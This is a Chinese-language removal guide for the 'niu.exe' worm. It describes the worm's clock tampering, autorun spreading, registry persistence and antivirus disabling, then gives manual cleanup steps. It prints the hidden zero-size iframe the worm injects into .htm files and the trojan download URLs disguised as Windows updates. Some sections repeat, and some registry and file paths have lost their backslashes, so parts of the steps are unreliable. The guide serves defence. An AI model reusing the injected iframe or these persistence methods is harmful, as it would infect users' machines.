niu.exe病毒清除
症状:
1.修改系统时间,改为1987.10.18(使杀毒软件失效.)
2.在各盘生成niu.exe和autorun.inf(进入其他盘立即感染病毒.)
3.删除 .gho文件.(禁止系统被ghost还原.)
4.在C:\WINDOWS\system32\释放crsss.exe(利用文件名混淆用户视野...这个文件跟系统关键进程csrss.exe很像)
5.感染 .htm文件.插入病毒代码.(开IE立即中毒.)
6.删除C:\WINDOWS\system32\verclsid.exe(不晓得这个是干嘛的,百度一下发现是微软的一个有bug的补丁.)
7.文件变化:
释放文件C:\WINDOWS\system32\crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化
遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=http://www.xxxxxx.cn/htm/htm.htm width=0 height=0></IfrAmE>
遍历所有分区 删除*.gho文件
删除C:\WINDOWS\system32\verclsid.exe
8.注册表变化
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下添加<crsss><C:\WINDOWS\system32\crsss.exe> [] 达到开机启动的目的
修改HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加
DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能
如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page为
www.hao123.com并且修改HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001
使得IE主页修改按钮失效
如果连接网络则为如下变化
下载
http://www.xxxxxx.cn/htm/IEURL.txt到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址
下载
http://www.xxxxxx.cn/htm/exe.txt到系统文件夹 读取里面的内容
下载木马
http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB138308-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB238104-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB284302-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB468603-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB878206-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB423807-x86-CHS.exehttp://www.xxxxxx.cn/xp/WindowsXP-KB138309-x86-CHS.exe到系统文件夹 分别命名为0temp.exe~13temp.exe
木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等 而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启
具体原理不懂 希望高手指教
木马植入完毕后 生成文件如下
C:\WINDOWS\system32\10temp.DAT
C:\WINDOWS\system32\7temp.DAT
C:\WINDOWS\system32\Autorun.inf
C:\WINDOWS\system32\c.txt
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\d.txt
C:\WINDOWS\system32\dhbini.dll
C:\WINDOWS\system32\dhbpri.dll
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\test1.txt
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\ztgini.dll
C:\WINDOWS\system32\ztgpri.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%\tlso.exe
%temp%\zxzo0.dll
%temp%\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
9.sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe> []
<WinForm><C:\WINDOWS\WinForm.exe> []
<tlsa><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<KVP><C:\WINDOWS\system32\drivers\svchost.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><dhbpri.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:\WINDOWS\system32\dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:\WINDOWS\system32\ztgpri.dll> []
服务
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
<C:\WINDOWS\system32\rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>
解决方法:
首先把系统时间改回来
并且修改 C:\WINDOWS\system32\dhbpri.dll和
C:\WINDOWS\system32\ztgpri.dll文件名为其他名称
然后重启计算机进入
安全模式(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe> []
<WinForm><C:\WINDOWS\WinForm.exe> []
<tlsa><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<KVP><C:\WINDOWS\system32\drivers\svchost.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:\WINDOWS\system32\dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:\WINDOWS\system32\ztgpri.dll> []
双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service / RemoteDbg
系统修复-Windows shell/IE 选中
设置主页为"about:blank"和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复
9.修改注册表.
在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下添加名称为 crsss 的键,键值为 C:WINDOWS\system32\crsss.exe(开机运行病毒.)
修改HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL中的CheckedValue的键值为 0x00000001 (隐藏病毒文件.)
在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下添加DisableWindowsUpdateAccess键,并把其键值设为 00000001 (关闭自动更新.)
8.关闭系统防护软件,如瑞星卡卡上网助手,这个是这个病毒最有趣的地方,它只是让防护软件处于非保护系统状态,而并不是单纯的结束软件进程.
9.到病毒指定网址下载病毒,生成以下病毒文件.
C:\windows\system32\10temp.DAT
C:\windows\system32\7temp.DAT
C:\windows\system32\Autorun.inf
C:\windows\system32\c.txt
C:\windows\system32\drivers\svchost.exe
C:\windows\system32\d.txt
C:\windows\system32\dhbini.dll
C:\windows\system32\dhbpri.dll
C:\windows\system32\nwizqjsj.exe
C:\windows\system32\RemoteDbg.dll
C:\windows\system32\test1.txt
C:\windows\system32\TIMHost.dll
C:\windows\system32\WinForm.dll
C:\windows\system32\ztgini.dll
C:\windows\system32\ztgpri.dll
C:WINDOWS\TIMHost.exe
C:WINDOWS\WinForm.exe
C:WINDOWS\temp\tlso.exe
C:WINDOWS\temp\zxzo0.dll
C:WINDOWS\temp\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
10.添加并开启Remote Debug Service服务.
杀掉它的办法...
1.改回正确系统时间
2.修改 C:\WINDOWS\system32\dhbpri.dll和C:\WINDOWS\system32ztgpri.dll文件名为任意文件名
3.进入安全模式修改注册表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
删除以下键值
crsss ; WinForm ; tlsa ; TIMHost ; KVP
修改HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
删除以下键值
754FB7D8-B8FE-4810-B363-A788CD060F1F ;22311A42-AC1B-158F-FD32-5674345F23A2 ;
71351752-5628-1547-FFAB-BADC13512AF7
并修改AppInit_DLLs 的键值为空
4.删除 Remote Debug Service 服务
定位注册表到HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services
找到 Remote Debug Service 键值删除即可.
(以上两步可利用软件,如windows优化***的开机自动启动项修改,或sreng)
5.利用超级兔子等工具修复IE.
6.打开记事本输入以下段落保存为 .reg 的注册表文件,双击导入.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
进入"我的电脑","工具""文件夹选项""查看",选取"显示隐藏文件或文件夹"并反选"隐藏受保护的操作系统文件(推荐)"
7.开"我的电脑",在目录框里输入C:\WINDOWS\system32,进入并删除以下文件.
C:\WINDOWS\system32\10temp.DAT
C:\WINDOWS\system32\7temp.DAT
C:\WINDOWS\system32\Autorun.inf
C:\WINDOWS\system32\c.txt
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\d.txt
C:\WINDOWS\system32\dhbini.dll
C:\WINDOWS\system32\dhbpri.dll改完名称的文件
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\test1.txt
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\ztgini.dll
C:\WINDOWS\system32\ztgpri.dll改完名称的文件
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
C:\WINDOWS\temp\tlso.exe
C:\WINDOWS\temp\zxzo0.dll
C:\WINDOWS\temp\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
C:\WINDOWS\system32\crsss.exe
C:\autorun.inf
C:\niu.exe
开"我的电脑",输入D:\,进入后将autorun.inf和niu.exe文件删除,有几个盘就要清几个盘...(切记不可双击进入,否则前功尽弃.)
8.扫描 .htm文件,全部删除.
9.重启,安装杀毒软件,升级到最新病毒库,全盘扫描.安装系统修复工具,修复系统漏洞,清理注册表.
至此全部完毕.最惨的是gho文件没法恢复了...只能重新做系统盘的镜像了.
*****************************************************
以上资源来至网络
